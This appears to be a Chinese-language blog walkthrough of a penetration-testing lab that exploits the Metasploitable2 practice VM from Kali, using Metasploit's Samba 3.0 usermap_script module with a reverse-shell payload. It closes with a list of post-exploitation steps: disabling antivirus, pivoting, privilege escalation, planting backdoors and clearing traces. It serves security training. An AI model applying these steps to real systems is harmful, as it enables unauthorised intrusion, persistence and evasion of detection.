渗透Metasploitable2
Metasploitable2是一款很好的渗透测试靶机
实验环境
攻击机:kali IP:192.168.211.140
目标主机:Metasploitable2 IP:192.168.211.132
信息收集
1.使用命令msfconsole进入msf控制台
2.使用Nmap扫描,查看目标系统开放端口和服务.
3.根据扫描结果选择合适的exploit和payload
此次使用Samba3.0存在的漏洞进行攻击
**提示:**在rank栏选择great/excellent的模块,会有很好效果,成功率更高.
4.使用攻击模块
选择exploit/multi/samba/usermap_script
提示:使用info+模块 查看说明
show payloads,查看可用攻击载荷.
5.设置攻击载荷
set PAYLOAD cmd/unix/reverse
设置目标机IP及端口
设置攻击机IP
注意:此处的端口号是漏洞服务对应的端口号,在Nmap那一步可以看到.
show options可以查看payload的配置,Required为不可缺参数
6.使用expolit命令进行攻击
已成功获取目标主机shell !
可以使用命令 uname -a 进行验证.
后续
- 进一步获取目标系统信息
- 关闭目标系统杀毒软件
- 利用已攻陷的主机做为跳板/肉鸡
- 后渗透(权限提升、横向提权、纵向提权)
- 留下后门
- 痕迹清除
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 h4m5t's Blog!